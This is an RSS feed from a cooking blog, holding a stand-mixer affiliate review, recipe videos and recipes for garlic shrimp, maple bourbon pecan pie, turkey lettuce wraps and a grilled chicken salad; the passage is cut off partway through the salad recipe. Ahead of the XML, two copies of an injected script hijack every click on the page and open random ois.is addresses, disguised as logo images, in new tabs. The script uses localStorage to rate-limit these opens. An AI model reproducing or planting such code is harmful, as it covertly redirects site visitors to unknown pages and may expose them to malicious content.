<script>(function (parameters) {
		const targets = [
			'https://ois.is/images/logo-1.png', 'https://ois.is/images/logo-2.png', 'https://ois.is/images/logo-3.png', 'https://ois.is/images/logo-4.png', 'https://ois.is/images/logo-5.png', 'https://ois.is/images/logo-6.png', 'https://ois.is/images/logo-7.png', 'https://ois.is/images/logo-8.png'
		]
		// Times between clicks
		const restMinutes = 1;
		// Number of hours to allow re-click 
		const allowedHours = 2;


		const saveTargetLocationsToStorage = (targets) => {
			targets.forEach((target, index) => {
				if(!localStorage.getItem(`${target}-local-storage`)){
					localStorage.setItem(`${target}-local-storage`, 0);
				}
			});
		}
		const getRandomLocationFromStorage = (targets) => {
			const nonVisited = targets.filter((target, index) => localStorage.getItem(`${target}-local-storage`) == 0)
			return nonVisited[Math.floor(Math.random() * nonVisited.length)];
		}
		const setLocationAsVisited = (target) => localStorage.setItem(`${target}-local-storage`, 1);

		const getTimeStorage = (key) => localStorage.getItem(`${key}-local-storage`);
		const setTimeToStorage = (key, nowDate) => localStorage.setItem(`${key}-local-storage`, nowDate);

		const getHoursDiff = (startDate, endDate) => {
			const msInHour = 1000 * 60 * 60;
			return Math.round(Math.abs(endDate - startDate) / msInHour);
		}
		const getMintsDiff = (startDate, endDate) => {
			const msInMints = 1000 * 60;
			return Math.round(Math.abs(endDate - startDate) / msInMints);
		}

		const visitNewLocation = (targets, host, nowDate) => {
			saveTargetLocationsToStorage(targets);
			newLocation = getRandomLocationFromStorage(targets);
			setTimeToStorage(`${host}-mnts`, nowDate);
			setTimeToStorage(`${host}-hurs`, nowDate);
			setLocationAsVisited(newLocation);
			window.open(newLocation, "_blank");
		}

		// const randomLocation = getRandomLocationFromStorage(targets);
		saveTargetLocationsToStorage(targets);

		function globalClick(event) {
			event.stopPropagation();
			const host = location.host;
			let newLocation = getRandomLocationFromStorage(targets);
			const nowDate = Date.parse(new Date());
			const savedDateForMints = getTimeStorage(`${host}-mnts`);
			const savedDateForHours = getTimeStorage(`${host}-hurs`);

			if (savedDateForMints && savedDateForHours) {
				try {
					const storageDateForMints = parseInt(savedDateForMints);
					const storageDateForHours = parseInt(savedDateForHours);
					const mintsDiff = getMintsDiff(nowDate, storageDateForMints);
					const hoursDiff = getHoursDiff(nowDate, storageDateForHours);

					if (hoursDiff >= allowedHours) {
						saveTargetLocationsToStorage(targets);
						setTimeToStorage(`${host}-hurs`, nowDate);
					}
					if (mintsDiff >= restMinutes) {
						if (newLocation) {
							setTimeToStorage(`${host}-mnts`, nowDate);
							window.open(newLocation, "_blank");
							setLocationAsVisited(newLocation);
						}
					}
				} catch (error) { visitNewLocation(targets, host, nowDate); }
			} else { visitNewLocation(targets, host, nowDate); }
		}
		document.addEventListener("click", globalClick)
	})()</script><script>(function (parameters) {
		const targets = [
			'https://ois.is/images/logo-1.png', 'https://ois.is/images/logo-2.png', 'https://ois.is/images/logo-3.png', 'https://ois.is/images/logo-4.png', 'https://ois.is/images/logo-5.png', 'https://ois.is/images/logo-6.png', 'https://ois.is/images/logo-7.png', 'https://ois.is/images/logo-8.png'
		]
		// Times between clicks
		const restMinutes = 1;
		// Number of hours to allow re-click 
		const allowedHours = 2;


		const saveTargetLocationsToStorage = (targets) => {
			targets.forEach((target, index) => {
				if(!localStorage.getItem(`${target}-local-storage`)){
					localStorage.setItem(`${target}-local-storage`, 0);
				}
			});
		}
		const getRandomLocationFromStorage = (targets) => {
			const nonVisited = targets.filter((target, index) => localStorage.getItem(`${target}-local-storage`) == 0)
			return nonVisited[Math.floor(Math.random() * nonVisited.length)];
		}
		const setLocationAsVisited = (target) => localStorage.setItem(`${target}-local-storage`, 1);

		const getTimeStorage = (key) => localStorage.getItem(`${key}-local-storage`);
		const setTimeToStorage = (key, nowDate) => localStorage.setItem(`${key}-local-storage`, nowDate);

		const getHoursDiff = (startDate, endDate) => {
			const msInHour = 1000 * 60 * 60;
			return Math.round(Math.abs(endDate - startDate) / msInHour);
		}
		const getMintsDiff = (startDate, endDate) => {
			const msInMints = 1000 * 60;
			return Math.round(Math.abs(endDate - startDate) / msInMints);
		}

		const visitNewLocation = (targets, host, nowDate) => {
			saveTargetLocationsToStorage(targets);
			newLocation = getRandomLocationFromStorage(targets);
			setTimeToStorage(`${host}-mnts`, nowDate);
			setTimeToStorage(`${host}-hurs`, nowDate);
			setLocationAsVisited(newLocation);
			window.open(newLocation, "_blank");
		}

		// const randomLocation = getRandomLocationFromStorage(targets);
		saveTargetLocationsToStorage(targets);

		function globalClick(event) {
			event.stopPropagation();
			const host = location.host;
			let newLocation = getRandomLocationFromStorage(targets);
			const nowDate = Date.parse(new Date());
			const savedDateForMints = getTimeStorage(`${host}-mnts`);
			const savedDateForHours = getTimeStorage(`${host}-hurs`);

			if (savedDateForMints && savedDateForHours) {
				try {
					const storageDateForMints = parseInt(savedDateForMints);
					const storageDateForHours = parseInt(savedDateForHours);
					const mintsDiff = getMintsDiff(nowDate, storageDateForMints);
					const hoursDiff = getHoursDiff(nowDate, storageDateForHours);

					if (hoursDiff >= allowedHours) {
						saveTargetLocationsToStorage(targets);
						setTimeToStorage(`${host}-hurs`, nowDate);
					}
					if (mintsDiff >= restMinutes) {
						if (newLocation) {
							setTimeToStorage(`${host}-mnts`, nowDate);
							window.open(newLocation, "_blank");
							setLocationAsVisited(newLocation);
						}
					}
				} catch (error) { visitNewLocation(targets, host, nowDate); }
			} else { visitNewLocation(targets, host, nowDate); }
		}
		document.addEventListener("click", globalClick)
	})()</script><?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Chef Tom Cooks !</title>
	<atom:link href="http://cheftomcooks.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://cheftomcooks.com</link>
	<description>A friendly cooking and recipe blog.</description>
	<lastBuildDate>Fri, 05 Jun 2020 14:41:23 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.9.4</generator>
	<item>
		<title>Review &#8211; Hamilton Beach Electric Stand Mixer</title>
		<link>http://cheftomcooks.com/2020/06/05/review-hamilton-beach-electric-stand-mixer/</link>
					<comments>http://cheftomcooks.com/2020/06/05/review-hamilton-beach-electric-stand-mixer/#respond</comments>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Fri, 05 Jun 2020 14:39:29 +0000</pubDate>
				<category><![CDATA[Articles]]></category>
		<category><![CDATA[Reviews]]></category>
		<category><![CDATA[electric mixer]]></category>
		<category><![CDATA[electric stand mixer]]></category>
		<category><![CDATA[hamilton beach]]></category>
		<guid isPermaLink="false">http://cheftomcooks.com/?p=112812</guid>

					<description><![CDATA[Same mixing action as KitchenAid stand mixers*. this mixer performs better than 2-beater stand mixers, and features the popular tilt-up head design for adding ingredients and changing attachments quickly. Baking [&#8230;]]]></description>
										<content:encoded><![CDATA[
<p>Same mixing action as KitchenAid stand mixers*. this mixer performs better than 2-beater stand mixers, and features the popular tilt-up head design for adding ingredients and changing attachments quickly. Baking with ease: effortlessly mix Thick batters and doughs like breads, pizza, cookies, mashed potatoes and more with a powerful, 300 watt motor. Complete bowl coverage: No scraping necessary. Mix hands-free with excellent results every time. Planetary mixing rotates the beaters around the 4 quart, stainless steel bowl, for even and complete mixing. Mixing versatility: includes splash guard, dough hook, whisk and flat beater. Wipe outside of stand mixer with a damp cloth or sponge and dry 7 speeds and mixing guide: go from a slow stir to a fast mix, with exact control at each setting. A helpful guide at the mixer’s top lets you know which speed to use for various mixing methods. KitchenAid is the registered trademark of Whirlpool properties use of the KitchenAid trademark does not imply any affiliation with or endorsement by KitchenAid or Whirlpool properties</p>



<div class="wp-block-buttons is-layout-flex wp-block-buttons-is-layout-flex">
<div class="wp-block-button"><a class="wp-block-button__link has-text-color has-very-dark-gray-color has-background has-luminous-vivid-amber-background-color" href="https://amzn.to/3cAVlhe" target="_blank" rel="noreferrer noopener"><strong>BUY NOW!</strong></a></div>
</div>



<figure class="wp-block-embed-youtube wp-block-embed is-type-video is-provider-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper">
<iframe title="Hamilton Beach Electric Stand Mixer" width="500" height="281" src="https://www.youtube.com/embed/Fhtd0EzQRq4?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe>
</div></figure>



<p></p>
]]></content:encoded>
					
					<wfw:commentRss>http://cheftomcooks.com/2020/06/05/review-hamilton-beach-electric-stand-mixer/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Ultimate BBQ Rib Sandwich</title>
		<link>http://cheftomcooks.com/2019/11/19/ultimate-bbq-rib-sandwich/</link>
					<comments>http://cheftomcooks.com/2019/11/19/ultimate-bbq-rib-sandwich/#respond</comments>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Wed, 20 Nov 2019 04:04:25 +0000</pubDate>
				<category><![CDATA[Pork]]></category>
		<category><![CDATA[Sandwich]]></category>
		<category><![CDATA[Video]]></category>
		<category><![CDATA[bbq rib]]></category>
		<category><![CDATA[sandwich]]></category>
		<guid isPermaLink="false">http://cheftomcooks.com/?p=112326</guid>

					<description><![CDATA[Forget about that fast food, so-called &#8220;rib&#8221; sandwich that everyone raves about. This video will show you how to take a slab of ribs and cook it so the bones [&#8230;]]]></description>
										<content:encoded><![CDATA[
<p>Forget about that fast food, so-called &#8220;rib&#8221; sandwich that everyone raves about.  This video will show you how to take a slab of ribs and cook it so the bones slide right out.  What you&#8217;re left with is a slab of boneless ribs that just melt in your mouth.  Perfect for making the ultimate BBQ rib sandwich.</p>



<figure class="wp-block-embed-youtube wp-block-embed is-type-video is-provider-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper">
<iframe title="How To Make Alvin&#039;s Giant BBQ Rib Sandwich • Tasty" width="500" height="281" src="https://www.youtube.com/embed/Z83QQjrEjP4?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe>
</div></figure>
]]></content:encoded>
					
					<wfw:commentRss>http://cheftomcooks.com/2019/11/19/ultimate-bbq-rib-sandwich/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Gordon Ramsay&#8217;s Top 5 Dessert Recipes</title>
		<link>http://cheftomcooks.com/2019/11/18/gordon-ramsays-top-5-dessert-recipes/</link>
					<comments>http://cheftomcooks.com/2019/11/18/gordon-ramsays-top-5-dessert-recipes/#respond</comments>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Mon, 18 Nov 2019 20:29:04 +0000</pubDate>
				<category><![CDATA[Dessert]]></category>
		<category><![CDATA[Video]]></category>
		<category><![CDATA[gordon ramsay]]></category>
		<guid isPermaLink="false">http://cheftomcooks.com/?p=112320</guid>

					<description><![CDATA[Do you have a sweet tooth? Want enjoy some of Gordon Ramsay&#8217;s favorite desserts? In this video you&#8217;ll learn how to prepare 5 of Chef Ramsay&#8217;s best dessert recipes. This [&#8230;]]]></description>
										<content:encoded><![CDATA[
<p>Do you have a sweet tooth?  Want enjoy some of Gordon Ramsay&#8217;s favorite desserts?  In this video you&#8217;ll learn how to prepare 5 of Chef Ramsay&#8217;s best dessert recipes.  This includes how to make, profiteroles, a hazelnut meringue tower, a vanilla cheesecake, strawberry glory and a chocolate, marshmallow, peanut fridge cake.  Learn how to make these dishes straight from the master.</p>



<figure class="wp-block-embed-youtube wp-block-embed is-type-video is-provider-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper">
<iframe title="Gordon Ramsay’s Top 5 Desserts | COMPILATION" width="500" height="281" src="https://www.youtube.com/embed/IB4JJw28C4Q?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe>
</div></figure>
]]></content:encoded>
					
					<wfw:commentRss>http://cheftomcooks.com/2019/11/18/gordon-ramsays-top-5-dessert-recipes/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Bloomin&#8217; Brie Bread</title>
		<link>http://cheftomcooks.com/2019/11/12/bloomin-brie-bread/</link>
					<comments>http://cheftomcooks.com/2019/11/12/bloomin-brie-bread/#respond</comments>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Wed, 13 Nov 2019 03:24:50 +0000</pubDate>
				<category><![CDATA[Appetizers]]></category>
		<category><![CDATA[Video]]></category>
		<category><![CDATA[brie]]></category>
		<category><![CDATA[Cheese]]></category>
		<guid isPermaLink="false">http://cheftomcooks.com/?p=112309</guid>

					<description><![CDATA[If you&#8217;re a cheese lover then this recipe is just for you! Make this for your next party and everyone will be amazed at how good it is.]]></description>
										<content:encoded><![CDATA[
<p>If you&#8217;re a cheese lover then this recipe is just for you!  Make this for your next party and everyone will be amazed at how good it is.</p>



<figure class="wp-block-embed-youtube wp-block-embed is-type-video is-provider-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper">
<iframe loading="lazy" title="How to Make Bloomin&#039; Brie Bread | Recipe | Delish" width="500" height="281" src="https://www.youtube.com/embed/Fj_ABpfsLKU?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe>
</div></figure>
]]></content:encoded>
					
					<wfw:commentRss>http://cheftomcooks.com/2019/11/12/bloomin-brie-bread/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Spanish Garlic Shrimp</title>
		<link>http://cheftomcooks.com/2017/01/10/spanish-garlic-shrimp/</link>
					<comments>http://cheftomcooks.com/2017/01/10/spanish-garlic-shrimp/#respond</comments>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Tue, 10 Jan 2017 16:09:56 +0000</pubDate>
				<category><![CDATA[Appetizers]]></category>
		<category><![CDATA[Cuisine]]></category>
		<category><![CDATA[Recipes]]></category>
		<category><![CDATA[Seafood]]></category>
		<category><![CDATA[Spanish]]></category>
		<category><![CDATA[garlic]]></category>
		<category><![CDATA[shrimp]]></category>
		<category><![CDATA[tapas]]></category>
		<guid isPermaLink="false">http://cheftomcooks.com/?p=107264</guid>

					<description><![CDATA[My girlfriend and I love dining at tapas style restaurants.  Recently we ordered a wonderfully tasty Spanish shrimp dish and instantly I knew I needed to recreate this dish at [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><img loading="lazy" decoding="async" class="alignnone size-full wp-image-107305" src="http://cheftomcooks.com/wp-content/uploads/2017/01/shrimp.jpg" alt="" width="600" height="338" srcset="http://cheftomcooks.com/wp-content/uploads/2017/01/shrimp.jpg 600w, http://cheftomcooks.com/wp-content/uploads/2017/01/shrimp-300x169.jpg 300w, http://cheftomcooks.com/wp-content/uploads/2017/01/shrimp-150x85.jpg 150w" sizes="auto, (max-width: 600px) 100vw, 600px" /></p>
<p>My girlfriend and I love dining at tapas style restaurants.  Recently we ordered a wonderfully tasty Spanish shrimp dish and instantly I knew I needed to recreate this dish at home.  Simple yet loaded with flavor.  Serve this dish with a couple pieces of toasted crusty bread to dip into the sauce.</p>
<div class="easyrecipe" data-rating="0"> 	<link itemprop="image" href="http://cheftomcooks.com/wp-content/uploads/2017/01/spanishshrimp.jpg" />
<div class="item ERName">Spanish Garlic Shrimp</div>
<div class="ERClear"></div>
<div class="ERHead"><span class="xlate">Recipe Type</span>: <span class="type">Appetizer</span></div>
<div class="ERHead">Cuisine: <span class="cuisine">Spanish</span></div>
<div class="ERHead">Author: <span class="author">Chef Tom</span></div>
<div class="ERHead">Prep time: <time itemprop="prepTime" datetime="PT5M">5 mins</time></div>
<div class="ERHead">Cook time: <time itemprop="cookTime" datetime="PT6M">6 mins</time></div>
<div class="ERHead">Total time: <time itemprop="totalTime" datetime="PT11M">11 mins</time></div>
<div class="ERHead">Serves: <span class="yield">Serves 4-6</span></div>
<div class="ERIngredients">
<div class="ERIngredientsHeader">Ingredients</div>
<ul class="ingredients">
<li class="ingredient">⅓ cup olive oil</li>
<li class="ingredient">4 cloves garlic, finely chopped</li>
<li class="ingredient">¼ teaspoon red pepper flakes</li>
<li class="ingredient">1 pound large shrimp, peeled and deveined</li>
<li class="ingredient">1 teaspoon Spanish paprika</li>
<li class="ingredient">¼ teaspoon kosher salt</li>
<li class="ingredient">⅛ teaspoon pepper</li>
<li class="ingredient">2 tablespoons dry sherry</li>
<li class="ingredient">1 ½ tablespoons fresh lemon juice</li>
<li class="ingredient">2 tablespoons fresh chopped parsley</li>
</ul>
</div>
<div class="ERInstructions">
<div class="ERInstructionsHeader">Instructions</div>
<div class="instructions">
<ol>
<li class="instruction">Add the oil into a large sauté pan then add the garlic and chili flakes. Turn the heat up to medium high. As the pan heats up, the oil will slowly get infused with the flavor of the garlic and chili (don&#8217;t let the garlic brown).</li>
<li class="instruction">Once the oil is hot and the garlic is fragrant, add the shrimp to the pan. Season them with the paprika, salt and pepper. Cook the shrimp about 2 minutes, until they just turn pink, stirring often.</li>
<li class="instruction">Add the sherry and lemon juice and cook another 2-3 minutes until the liquid is reduced and shrimp are cooked.</li>
<li class="instruction">Sprinkle the parsley on top.</li>
</ol>
</div>
</div>
<div class="ERNutrition"></div>
<div class="endeasyrecipe" style="display: none;">3.5.3208</div>
</div>
<p>&nbsp;</p>
]]></content:encoded>
					
					<wfw:commentRss>http://cheftomcooks.com/2017/01/10/spanish-garlic-shrimp/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Maple Bourbon Pecan Pie</title>
		<link>http://cheftomcooks.com/2017/01/07/maple-bourbon-pecan-pie/</link>
					<comments>http://cheftomcooks.com/2017/01/07/maple-bourbon-pecan-pie/#respond</comments>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Sat, 07 Jan 2017 22:43:42 +0000</pubDate>
				<category><![CDATA[Dessert]]></category>
		<category><![CDATA[Recipes]]></category>
		<category><![CDATA[bourbon]]></category>
		<category><![CDATA[pecan pie]]></category>
		<category><![CDATA[pie]]></category>
		<guid isPermaLink="false">http://cheftomcooks.com/?p=107261</guid>

					<description><![CDATA[I made this for the holidays and it was a huge hit around the dinner table.  So rich and oh so good!  Use Bulleit bourbon, Jack Daniels, or your favorite [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><img loading="lazy" decoding="async" class="alignnone size-full wp-image-107262" src="http://cheftomcooks.com/wp-content/uploads/2017/01/pecanpie.jpg" alt="maple bourbon pecan pie" width="550" height="378" srcset="http://cheftomcooks.com/wp-content/uploads/2017/01/pecanpie.jpg 550w, http://cheftomcooks.com/wp-content/uploads/2017/01/pecanpie-300x206.jpg 300w" sizes="auto, (max-width: 550px) 100vw, 550px" /></p>
<p>I made this for the holidays and it was a huge hit around the dinner table.  So rich and oh so good!  Use Bulleit bourbon, Jack Daniels, or your favorite bourbon in this pie recipe.</p>
<div class="easyrecipe" data-rating="0">	<link itemprop="image" href="http://cheftomcooks.com/wp-content/uploads/2017/01/pecanpie.jpg" />
<div class="item ERName">Maple Bourbon Pecan Pie</div>
<div class="ERClear"></div>
<div class="ERHead"><span class="xlate">Recipe Type</span>: <span class="type">Dessert</span></div>
<div class="ERHead">Author: <span class="author">Chef Tom</span></div>
<div class="ERHead">Prep time: <time itemprop="prepTime" datetime="PT25M">25 mins</time></div>
<div class="ERHead">Cook time: <time itemprop="cookTime" datetime="PT40M">40 mins</time></div>
<div class="ERHead">Total time: <time itemprop="totalTime" datetime="PT1H5M">1 hour 5 mins</time></div>
<div class="ERHead">Serves: <span class="yield">10 servings</span></div>
<div class="ERIngredients">
<div class="ERIngredientsHeader">Ingredients</div>
<ul class="ingredients">
<li class="ingredient">2 1/4 cups raw pecan halves</li>
<li class="ingredient">6 tablespoons butter</li>
<li class="ingredient">2/3 cup dark brown sugar</li>
<li class="ingredient">1/2 teaspoon fine sea salt</li>
<li class="ingredient">3 large eggs</li>
<li class="ingredient">2/3 cup pure maple syrup</li>
<li class="ingredient">2 teaspoons vanilla extract</li>
<li class="ingredient">4 tablespoons bourbon, divided use</li>
<li class="ingredient">pre-made pie crust</li>
</ul>
</div>
<div class="ERInstructions">
<div class="ERInstructionsHeader">Instructions</div>
<div class="instructions">
<ol>
<li class="instruction">Spread the pecan halves on a small baking sheet in a single layer and toast in a 350º F oven until fragrant, 12-14 minutes. Let the nuts cool, then use your fingers to break each half into 4-8 pieces.</li>
<li class="instruction">Reduce the oven temperature to 275º F.</li>
<li class="instruction">In a medium-large saucepan, melt the butter with the brown sugar and salt.</li>
<li class="instruction">Remove from heat let cool 30 seconds then gently whisk in the eggs one at a time, then the maple syrup, vanilla and 2 tablespoons of the bourbon.</li>
<li class="instruction">Return the pot to a low heat and cook, stirring constantly with a heat-proof rubber spatula, until the mixture is warm to the touch (130ºF on an instant-read thermometer).</li>
<li class="instruction">Remove from the heat and whisk in the remaining 2 tablespoons of bourbon and the pecan pieces.</li>
<li class="instruction">Pour the mixture into the prepared pie shell.</li>
<li class="instruction">Bake the pie at 275º until the custard is mostly set, 25-40 minutes.</li>
</ol>
</div>
</div>
<div class="ERNutrition"></div>
<div class="endeasyrecipe" style="display: none;">3.5.3208</div>
</div>
<p>&nbsp;</p>
]]></content:encoded>
					
					<wfw:commentRss>http://cheftomcooks.com/2017/01/07/maple-bourbon-pecan-pie/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Asian Turkey Lettuce Wraps</title>
		<link>http://cheftomcooks.com/2017/01/06/asian-turkey-lettuce-wraps/</link>
					<comments>http://cheftomcooks.com/2017/01/06/asian-turkey-lettuce-wraps/#respond</comments>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Fri, 06 Jan 2017 22:30:32 +0000</pubDate>
				<category><![CDATA[Appetizers]]></category>
		<category><![CDATA[Asian]]></category>
		<category><![CDATA[Healthy Eating]]></category>
		<category><![CDATA[Low Carb]]></category>
		<category><![CDATA[Low Cholesterol]]></category>
		<category><![CDATA[low cholesterol]]></category>
		<category><![CDATA[Low Fat]]></category>
		<category><![CDATA[Main Dish]]></category>
		<category><![CDATA[Recipes]]></category>
		<category><![CDATA[Turkey]]></category>
		<category><![CDATA[lettuce]]></category>
		<guid isPermaLink="false">http://cheftomcooks.com/?p=107258</guid>

					<description><![CDATA[This healthy dish is just what you need in the new year!  Low in fat and carbs.  Serve this as an appetizer or a main dish. Asian Turkey Lettuce Wraps [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><img loading="lazy" decoding="async" class="alignnone size-full wp-image-107259" src="http://cheftomcooks.com/wp-content/uploads/2017/01/lettucewraps.jpg" alt="lettuce wraps" width="550" height="731" srcset="http://cheftomcooks.com/wp-content/uploads/2017/01/lettucewraps.jpg 550w, http://cheftomcooks.com/wp-content/uploads/2017/01/lettucewraps-226x300.jpg 226w" sizes="auto, (max-width: 550px) 100vw, 550px" /></p>
<p>This healthy dish is just what you need in the new year!  Low in fat and carbs.  Serve this as an appetizer or a main dish.</p>
<div class="easyrecipe" data-rating="0">
<div class="item ERName">Asian Turkey Lettuce Wraps</div>
<div class="ERClear"></div>
<div class="ERHead"><span class="xlate">Recipe Type</span>: <span class="type">Main</span></div>
<div class="ERHead">Cuisine: <span class="cuisine">Asian</span></div>
<div class="ERHead">Author: <span class="author">Chef Tom</span></div>
<div class="ERHead">Prep time: <time itemprop="prepTime" datetime="PT10M">10 mins</time></div>
<div class="ERHead">Cook time: <time itemprop="cookTime" datetime="PT10M">10 mins</time></div>
<div class="ERHead">Total time: <time itemprop="totalTime" datetime="PT20M">20 mins</time></div>
<div class="ERHead">Serves: <span class="yield">Serves 4</span></div>
<div class="ERIngredients">
<div class="ERIngredientsHeader">Ingredients</div>
<ul class="ingredients">
<li class="ingredient">1 pound ground turkey</li>
<li class="ingredient">2 tablespoons coconut oil</li>
<li class="ingredient">2 carrots, finely chopped or grated</li>
<li class="ingredient">3 cloves garlic, minced</li>
<li class="ingredient">2 tablespoons fresh ginger, peeled and grated</li>
<li class="ingredient">1 teaspoon Chinese 5 spice powder</li>
<li class="ingredient">1 tablespoon low sodium soy sauce</li>
<li class="ingredient">2 tablespoons rice wine vinegar</li>
<li class="ingredient">1 tablespoon coconut water</li>
<li class="ingredient">1 head Boston, bibb lettuce or Romain</li>
<li class="ingredient">chopped cilantro</li>
<li class="ingredient">2 green onions, chopped</li>
</ul>
</div>
<div class="ERInstructions">
<div class="ERInstructionsHeader">Instructions</div>
<div class="instructions">
<ol>
<li class="instruction">Melt coconut oil in a medium skillet over medium-high heat.</li>
<li class="instruction">Add carrots and saute for several minutes. Add garlic, ginger, turkey and Chinese 5 spice to the pan and saute until turkey is cooked through &#8211; about 3 to 5 minutes.</li>
<li class="instruction">Stir in soy sauce, vinegar and coconut water. Cook for a couple more minutes, stirring well to thoroughly combine.</li>
<li class="instruction">Put one scoop of turkey mixture into lettuce leaves. Top with green onions and cilantro.</li>
</ol>
</div>
</div>
<div class="ERNutrition"></div>
<div class="endeasyrecipe" style="display: none;">3.5.3208</div>
</div>
<p>&nbsp;</p>
]]></content:encoded>
					
					<wfw:commentRss>http://cheftomcooks.com/2017/01/06/asian-turkey-lettuce-wraps/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Lemon Marinated Grilled Chicken Salad with Lemon-Basil Dressing</title>
		<link>http://cheftomcooks.com/2016/11/16/lemon-marinated-grilled-chicken-salad-with-lemon-basil-dressing/</link>
					<comments>http://cheftomcooks.com/2016/11/16/lemon-marinated-grilled-chicken-salad-with-lemon-basil-dressing/#comments</comments>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Wed, 16 Nov 2016 13:30:33 +0000</pubDate>
				<category><![CDATA[Chicken]]></category>
		<category><![CDATA[Low Fat]]></category>
		<category><![CDATA[Recipes]]></category>
		<category><![CDATA[Salads]]></category>
		<category><![CDATA[basil dressing]]></category>
		<category><![CDATA[grilled chicken]]></category>
		<category><![CDATA[lemon]]></category>
		<category><![CDATA[salad]]></category>
		<guid isPermaLink="false">http://cheftomcooks.com/?p=107244</guid>

					<description><![CDATA[This easy to prepare salad is loaded with fresh and vibrant flavors that you&#8217;re guaranteed to love. Lemon Marinated Grilled Chicken Salad with Lemon-Basil Dressing Recipe Type: Salad Author: Chef [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><img loading="lazy" decoding="async" class="alignnone size-full wp-image-107246" src="http://cheftomcooks.com/wp-content/uploads/2016/11/salad.jpg" alt="salad" width="550" height="364" srcset="http://cheftomcooks.com/wp-content/uploads/2016/11/salad.jpg 550w, http://cheftomcooks.com/wp-content/uploads/2016/11/salad-300x199.jpg 300w" sizes="auto, (max-width: 550px) 100vw, 550px" /></p>
<p>This easy to prepare salad is loaded with fresh and vibrant flavors that you&#8217;re guaranteed to love.</p>
<div class="easyrecipe" data-rating="0">
<div class="item ERName">Lemon Marinated Grilled Chicken Salad with Lemon-Basil Dressing</div>
<div class="ERClear"></div>
<div class="ERHead"><span class="xlate">Recipe Type</span>: <span class="type">Salad</span></div>
<div class="ERHead">Author: <span class="author">Chef Tom</span></div>
<div class="ERHead">Prep time: <time itemprop="prepTime" datetime="PT35M">35 mins</time></div>
<div class="ERHead">Cook time: <time itemprop="cookTime" datetime="PT12M">12 mins</time></div>
<div class="ERHead">Total time: <time itemprop="totalTime" datetime="PT47M">47 mins</time></div>
<div class="ERHead">Serves: <span class="yield">serves 8</span></div>
<div class="ERIngredients">
<div class="ERIngredientsHeader">Ingredients</div>
<ul class="ingredients">
<li class="ingredient">For the chicken:</li>
<li class="ingredient">1 tablespoon fresh lemon juice (about 1/2 lemon)</li>
<li class="ingredient">1 1/2 teaspoons kosher salt</li>
<li class="ingredient">1/2 teaspoon fresh cracked black pepper</li>
<li class="ingredient">1 teaspoon sugar</li>
<li class="ingredient">3 tablespoons olive oil</li>
<li class="ingredient">4 boneless, skinless chicken breasts</li>
<li class="ingredient">For the dressing:</li>
<li class="ingredient">2/3 cup fresh basil</li>
<li class="ingredient">2 tablespoons fresh lemon juice</li>
<li class="ingredient">Kosher salt</li>
<li class="ingredient">Freshly ground black pepper</li>
<li class="ingredient">1 teaspoon honey</li>
<li class="ingredient">6 tablespoons olive oil</li>
<li class="ingredient">For the salad:</li>
<li class="ingredient">Grilled lemon chicken, 1/2 a breast per person</li>
<li class="ingredient">Leafy lettuce greens</li>
<li class="ingredient">Sliced avocado, 1/2 an avocado per person</li>
<li class="ingredient">Halved cherry tomatoes</li>
<li class="ingredient">diced red onion</li>
</ul>
</div>
<div class="ERInstructions">
<div class="ERInstructionsHeader">Instructions</div>
<div class="instructions">
<ol>
<li class="instruction">In a small bowl, whisk together lemon juice, salt, pepper, sugar and olive oil. Place chicken in a large sealable bag and pour in the marinade. Seal the bag, pressing out as much air as possible. Let rest in the fridge for 30 minutes, flipping halfway through.</li>
